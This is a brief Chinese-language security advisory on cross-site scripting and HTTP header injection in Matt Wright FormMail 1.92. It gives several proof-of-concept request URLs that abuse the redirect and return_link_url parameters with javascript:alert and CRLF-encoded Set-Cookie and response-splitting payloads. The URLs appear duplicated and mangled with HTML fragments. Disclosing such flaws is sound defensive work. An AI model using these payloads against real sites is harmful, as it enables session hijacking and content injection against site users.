影响版本:
Matt Wright FormMail 1.92
漏洞描述:
FormMail.pl模块没有正确地验证用户所提交的request和return_link_url参数,远程攻击者可以通过提交恶意请求执行跨站脚本攻击,或在返回给用户的响应中包含任意HTTP头。
漏洞利用:
foobar@example.com&subject=1&redirect=javascript:alert(%27USH%27);" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&redirect=javascript:alert(%27USH%27); foobar@example.com&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH foobar@example.com&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection; foobar@example.com&subject=1&redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com
解决方案:
厂商补丁:
http://worldwidemart.com/
0 条评论。